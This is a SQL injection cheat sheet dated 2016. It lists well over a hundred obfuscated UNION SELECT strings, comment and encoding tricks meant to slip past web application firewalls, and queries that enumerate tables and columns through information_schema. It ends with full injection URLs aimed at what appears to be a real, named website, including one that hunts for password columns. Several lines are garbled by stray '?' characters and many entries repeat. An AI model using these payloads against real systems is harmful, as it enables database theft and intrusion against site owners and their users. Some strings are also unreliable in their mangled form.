waf bypass sqli

1. WAF Bypass Cheat Sheet- 2016
2.  
3. Union Select
4. +union+distinct+select+
5. +union+distinctROW+select+
6. /**//*!12345UNION SELECT*//**/
7. /**//*!50000UNION SELECT*//**/
8. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
9. +/*!u%6eion*/+/*!se%6cect*/+
10. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
11. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
12. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
13. union /*!50000%53elect*/
14. %55nion %53elect
15. +--+Union+--+Select+--+
16. +UnIoN/*&a=*/SeLeCT/*&a=*/
17. id=1+?UnI?On?+'SeL?ECT?
18. id=1+'UnI'||'on'+SeLeCT'
19. UnIoN SeLeCt CoNcAt(version())--
20. uNiOn aLl sElEcT
21. uUNIONnion all sSELECTelect
22. /*union*/union/*select*/select+1,2,3/*
23. /*uniXon*/union/*selXect*/select+1,2/*
24. un/**/ion+sel/**/ect
25. +#1q%0Aunion all#qa%0A#%0Aselect
26. union /*!select*/+
27. union/**/select/**/
28. /**/union/**/select/**/
29. /**/union/*!50000select*/
30. /**//*!12345UNION SELECT*//**/
31. /**//*!50000UNION SELECT*//**/
32. /**/uniUNIONon/**/selSELECTect/**/
33. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
34. /**//*!union*//**//*!select*//**/
35. /**/UNunionION/**/SELselectECT/**/
36. /**//*UnIOn*//**//*SEleCt*//**/
37. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
38. /**/UNunionION/**/all/**/SELselectECT/**/
39. /**//*UnIOn*//**/all/**//*SEleCt*//**/
40. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
41. uni
42. %20union%20/*!select*/%20
43. union%23aa%0Aselect
44. union+distinct+select+
45. union+distinctROW+select+
46. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
47. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
48. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
49. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
50. /*!u%6eion*/+/*!se%6cect*/+
51. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
52. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
53. union /*!50000%53elect*/
54. +%2F**/+Union/*!select*/
55. %55nion %53elect
56. +?+Union+?+Select+?+
57. +UnIoN/*&a=*/SeLeCT/*&a=*/
58. uNiOn aLl sElEcT
59. uUNIONnion all sSELECTelect
60. union(select(1),2,3)
61. union (select 1111,2222,3333)
62. union (/*!/**/ SeleCT */ 11)
63. %0A%09UNION%0CSELECT%10NULL%
64. /*!union*//*?*//*!all*//*?*//*!select*/
65. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
66. union+sel%0bect
67. +uni*on+sel*ect+
68. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
69. union(select (1),(2),(3),(4),(5))
70. UNION(SELECT(column)FROM(table))
71. id=1+?UnI?On?+?SeL?ECT?
72. id=1+?UnI?||?on?+SeLeCT?
73. union select 1?+%0A,2?+%0A,3?+%0A etc ?
74. /*!00000Union*/ /*!00000Select*/
75. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
76. %55nion %53elect
77. %55nion(%53elect 1,2,3)-- -
78. +union+distinct+select+
79. +union+distinctROW+select+
80. /**//*!12345UNION SELECT*//**/
81. /**//*!50000UNION SELECT*//**/
82. /**/UNION/**//*!50000SELECT*//**/
83. /*!50000UniON SeLeCt*/
84. union /*!50000%53elect*/
85. + #?uNiOn + #?sEleCt
86. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
87. /*!%55NiOn*/ /*!%53eLEct*/
88. /*!u%6eion*/ /*!se%6cect*/
89. +un/**/ion+se/**/lect
90. uni%0bon+se%0blect
91. %2f**%2funion%2f**%2fselect
92. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
93. REVERSE(noinu)+REVERSE(tceles)
94. /*--*/union/*--*/select/*--*/
95. union (/*!/**/ SeleCT */ 1,2,3)
96. /*!union*/+/*!select*/
97. union+/*!select*/
98. /**/union/**/select/**/
99. /**/uNIon/**/sEleCt/**/
100. +%2F**/+Union/*!select*/
101. /**//*!union*//**//*!select*//**/
102. /*!uNIOn*/ /*!SelECt*/
103. +union+distinct+select+
104. +union+distinctROW+select+
105. uNiOn aLl sElEcT
106. UNIunionON+SELselectECT
107. /**/union/*!50000select*//**/
108. 0%a0union%a0select%09
109. %0Aunion%0Aselect%0A
110. %55nion/**/%53elect
111. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
112. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
113. %0A%09UNION%0CSELECT%10NULL%
114. /*!union*//*--*//*!all*//*--*//*!select*/
115. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
116. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
117. +UnIoN/*&a=*/SeLeCT/*&a=*/
118. union+sel%0bect
119. +uni*on+sel*ect+
120. +#1q%0Aunion all#qa%0A#%0Aselect
121. union(select (1),(2),(3),(4),(5))
122. UNION(SELECT(column)FROM(table))
123. %23xyz%0AUnIOn%23xyz%0ASeLecT+
124. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
125. union(select(1),2,3)
126. union (select 1111,2222,3333)
127. uNioN (/*!/**/ SeleCT */ 11)
128. union (select 1111,2222,3333)
129. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
130. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
131. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
132. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
133. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
134. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
135. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
136. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
137. /union\sselect/g
138. /union\s+select/i
139. /*!UnIoN*/SeLeCT
140. +UnIoN/*&a=*/SeLeCT/*&a=*/
141. +uni>on+sel>ect+
142. +(UnIoN)+(SelECT)+
143. +(UnI)(oN)+(SeL)(EcT)
144. +?UnI?On?+'SeL?ECT?
145. +uni on+sel ect+
146. +/*!UnIoN*/+/*!SeLeCt*/+
147. /*!u%6eion*/ /*!se%6cect*/
148. uni%20union%20/*!select*/%20
149. union%23aa%0Aselect
150. /**/union/*!50000select*/
151. /^.*union.*$/ /^.*select.*$/
152. /*union*/union/*select*/select+
153. /*uni X on*/union/*sel X ect*/
154. +un/**/ion+sel/**/ect+
155. +UnIOn%0d%0aSeleCt%0d%0a
156. UNION/*&test=1*/SELECT/*&pwn=2*/
157. un?+un/**/ion+se/**/lect+
158. +UNunionION+SEselectLECT+
159. +uni%0bon+se%0blect+
160. %252f%252a*/union%252f%252a /select%252f%252a*/
161. /%2A%2A/union/%2A%2A/select/%2A%2A/
162. %2f**%2funion%2f**%2fselect%2f**%2f
163. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
164. /*!UnIoN*/SeLecT+
165. Union Select by PASS with Url Encoded Method:
166. %55nion(%53elect)
167. union%20distinct%20select
168. union%20%64istinctRO%57%20select
169. union%2053elect
170. %23?%0auion%20?%23?%0aselect
171. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
172. %55nion %53eLEct
173. u%6eion se%6cect
174. unio%6e %73elect
175. unio%6e%20%64istinc%74%20%73elect
176. uni%6fn distinct%52OW s%65lect
177. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
178.  
179. Cheat Sheet of Bypassing Of Order by And Group By
180.  
181.  
182. order by/**_**/
183. /*!12345order*/ /*!12345by*/
184. ) order by 1-- -
185. ') order by 1-- -
186.  
187. ')order by 1%23%23
188.  
189. %')order by 1%23%23
190.  
191. Null' order by 100--+
192.  
193. Null' order by 9999--+
194.  
195. ')group by 99-- -
196.  
197. 'group by 119449-- -
198.  
199. 'group/**/by/**/99%23%23
200.  
201.  
202.  
203.  
204. Concat And Group_concat By Pass cheat Sheet ::
205.  
206.  
207.  
208. /*!12345group_concat*/(/*!12345table_name*/)
209. /*!50000group_concat*/(/*!50000table_name*/)
210. /*!GrOuP_ConCaT*/()
211. /*!12345GroUP_ConCat*/()
212. /*!50000gRouP_cOnCaT*/()
213. /*!50000Gr%6fuP_c%6fnCAT*/()
214. /*!group_concat*/()
215. gRoUp_cOnCAt()
216. group_concat(/*!*/)
217. group_concat(/*!12345table_name*/)
218. group_concat(/*!50000table_name*/)
219. /*!group_concat*/(/*!12345table_name*/)
220. /*!group_concat*/(/*!50000table_name*/)
221. unhex(hex(group_concat(table_name)))
222. unhex(hex(/*!group_concat*/(/*!table_name*/)))
223. unhex(hex(/*!12345group_concat*/(table_name)))
224. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
225. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
226. unhex(hex(/*!50000group_concat*/(table_name)))
227. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
228. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
229. CONVERT(group_concat(table_name)+USING+latin1)
230. CONVERT(group_concat(table_name)+USING+latin2)
231. CONVERT(group_concat(table_name)+USING+latin3)
232. CONVERT(group_concat(table_name)+USING+latin4)
233. CONVERT(group_concat(table_name)+USING+latin5)
234. convert(group_concat(table_name)+using+ascii)
235. convert(group_concat(/*!table_name*/)+using+ascii)
236. convert(group_concat(/*!12345table_name*/)+using+ascii)
237. convert(group_concat(/*!50000table_name*/)+using+ascii)
238. /*!concat_ws(0x3a,)*/
239. concat_ws(0x3a3a3a,version()
240. CONCAT_WS(CHAR(32,58,32),version(),)
241.  
242. How to By Pass Tables:::
243. group_concat(/*!table_name*/)
244.  
245. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -
246.  
247. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
248. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
249. How to By Pass Columns:::
250. group_concat(/*!column_name*/)
251. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
252. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -
253.  
254.  
255. URL enCoded By passing Table and columns::
256. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
257. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
258. like
259. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?
260.  
261. illegal mix of Collations ByPass ::
262.  
263. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
264. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
265.  
266. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?